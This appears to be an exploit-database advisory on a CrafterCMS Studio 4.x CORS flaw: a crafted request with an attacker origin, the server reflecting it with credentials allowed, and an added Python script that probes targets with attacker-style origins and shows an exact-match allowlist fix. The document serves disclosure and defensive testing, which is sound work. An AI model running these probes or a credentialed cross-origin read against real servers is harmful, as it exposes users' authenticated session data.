craftercms 4.x.x – CORS

  • Author: nu11secur1ty
    Date: 2023-04-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51313/
  • ## Exploit Title: craftercms 4.x.x - CORS 
    ## Author: nu11secur1ty
    ## Date: 03.07.2023
    ## Vendor: https://docs.craftercms.org/en/4.0/index.html#
    ## Software: https://github.com/craftercms/craftercms/tags => 4.x.x
    ## Reference: https://portswigger.net/web-security/cors
    
    
    ## Description:
    The CrafterCMS Studio API applies a cross-origin resource sharing (CORS)
    policy that reflects the request's Origin header back in
    Access-Control-Allow-Origin and sets Access-Control-Allow-Credentials: true.
    In the exchange below the attacker-supplied origin http://pwnedhost1.com/
    is echoed verbatim (trailing slash included, which a browser never sends,
    so the request was crafted by hand in a proxy). Reflection combined with
    credentials means a page on any attacker-controlled origin can make the
    victim's browser issue an authenticated request to Studio and read the
    JSON response, i.e. two-way interaction with the victim's session.
    Whether the null origin (what a sandboxed iframe sends) is also accepted
    is a separate check that this exchange does not cover.
    
    Two caveats before rating the impact: the endpoint shown returns public,
    non-sensitive data (the list of UI languages), so the real exposure
    depends on the same policy applying to endpoints that return
    session-bound data; and the cross-site request only carries JSESSIONID
    if that cookie is not restricted with SameSite=Lax or Strict, which
    should be confirmed with a browser-based PoC rather than a proxied
    request.
    
    STATUS: HIGH Vulnerability
    
    [+]Exploit:
    
    [-]REQUEST...
    
    ```http
    GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1
    Host: 192.168.100.87:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f; JSESSIONID=4730F0ED2120D31A17574CE997325DA8
    Referer: http://192.168.100.87:8080/studio/login
    x-requested-with: XMLHttpRequest
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Origin: http://pwnedhost1.com/
    ```
    [-]RESPONSE:
    
    ```http
    HTTP/1.1 200
    Vary: Origin
    Vary: Access-Control-Request-Method
    Vary: Access-Control-Request-Headers
    Access-Control-Allow-Origin: http://pwnedhost1.com/
    Access-Control-Allow-Credentials: true
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: 0
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Type: application/json;charset=UTF-8
    Content-Language: en-US
    Date: Tue, 07 Mar 2023 11:00:19 GMT
    Connection: close
    Content-Length: 124
    
    [{"id":"en","label":"English"},{"id":"es","label":"Español"},{"id":"kr","label":"한국어"},{"id":"de","label":"Deutsch"}]
    ```
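As an added worked example (not part of this advisory and not CrafterCMS code), the following Python script codifies the check behind the exchange above. `classify_cors` gives a verdict from the Origin that was sent and the response headers alone, so the advisory's response headers are embedded below as a constructed dict and classified offline; `probe_cors` drives the same check over the network with several attacker-style origins, using a browser-realistic origin without the trailing slash plus the `null` origin and a prefix-match variant; `strict_allow_origin` shows the server-side exact-match allowlist that closes the issue. The target URL, cookie value and probe origins are placeholders chosen for illustration.

```python
"""CORS origin-reflection check (added example; not CrafterCMS code).

classify_cors() gives a verdict for one request/response pair from the
Origin that was sent and the response headers, so it can be run against a
captured exchange offline. probe_cors() drives it over the network with a
set of attacker-style origins. strict_allow_origin() shows the server-side
allowlist that closes the issue.
"""
import urllib.error
import urllib.request

# Origins a tester should try; none of these should come back reflected.
# A real browser never sends a trailing slash or a path in Origin, so the
# advisory's "http://pwnedhost1.com/" is replaced by a browser-realistic form.
PROBE_ORIGINS = [
    "http://pwnedhost1.com",                  # arbitrary attacker origin (hypothetical)
    "null",                                   # what a sandboxed iframe / data: URL sends
    "http://192.168.100.87.pwnedhost1.com",   # prefix-match bypass attempt (hypothetical)
]

# Headers from the advisory's captured response, constructed here as a dict
# so the classifier can be exercised without a live target.
ADVISORY_RESPONSE_HEADERS = {
    "Vary": "Origin",
    "Access-Control-Allow-Origin": "http://pwnedhost1.com/",
    "Access-Control-Allow-Credentials": "true",
    "Content-Type": "application/json;charset=UTF-8",
}


def classify_cors(sent_origin, headers):
    """Return {'readable', 'credentialed', 'finding'} for one exchange.

    readable: a page at sent_origin could read the response body.
    credentialed: the browser would also attach cookies to that request.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    acac = h.get("access-control-allow-credentials", "").lower() == "true"

    if acao is None:
        return {"readable": False, "credentialed": False,
                "finding": "no Access-Control-Allow-Origin; cross-origin read blocked"}
    if acao == "*":
        # Browsers refuse '*' for credentialed requests, so only data that is
        # already public is exposed regardless of the ACAC value.
        return {"readable": True, "credentialed": False,
                "finding": "wildcard origin; credentialed reads still blocked by the browser"}
    if acao == "null":
        return {"readable": sent_origin == "null", "credentialed": acac,
                "finding": "null origin allowed; any site can obtain it via a sandboxed iframe"}
    if acao == sent_origin:
        if acac:
            finding = "origin reflected with credentials: authenticated cross-origin read"
        else:
            finding = "origin reflected without credentials: unauthenticated data only"
        return {"readable": True, "credentialed": acac, "finding": finding}
    return {"readable": False, "credentialed": acac,
            "finding": "fixed allowlist value %r does not match sent origin" % acao}


def probe_cors(url, origins=PROBE_ORIGINS, cookie=None, timeout=5):
    """Send one GET per origin and classify each response.

    url and cookie are placeholders supplied by the tester, e.g. the
    get-available-languages.json endpoint and a valid JSESSIONID cookie.
    """
    verdicts = {}
    for origin in origins:
        req = urllib.request.Request(url, headers={"Origin": origin, "Accept": "*/*"})
        if cookie:
            req.add_header("Cookie", cookie)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                hdrs = dict(resp.headers.items())
        except urllib.error.HTTPError as err:
            hdrs = dict(err.headers.items())  # CORS headers may be present on 4xx too
        verdicts[origin] = classify_cors(origin, hdrs)
    return verdicts


def strict_allow_origin(request_origin, allowlist):
    """Server-side fix: echo the origin only on an exact allowlist match.

    Returns the Access-Control-Allow-Origin value to emit, or None to omit
    the header entirely (never reflect, never allow 'null').
    """
    if request_origin in allowlist and request_origin != "null":
        return request_origin
    return None


if __name__ == "__main__":
    verdict = classify_cors("http://pwnedhost1.com/", ADVISORY_RESPONSE_HEADERS)
    print("advisory exchange:", verdict["finding"])
```

Run `probe_cors` with a valid session cookie and without one: if the verdict is the same in both cases the policy is applied before authentication, which matters for the impact question raised in the description. A "readable" verdict from this script shows what the server allows; it does not prove the browser will attach the session cookie, so pair it with a page on the attacker origin doing `fetch(url, {credentials: "include"})` to confirm the cookie's SameSite behaviour.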
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0)
    
    ## Proof and Exploit:
    [href](https://streamable.com/jd1x8j)
    
    ## Time spent:
    01:00:00
    
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>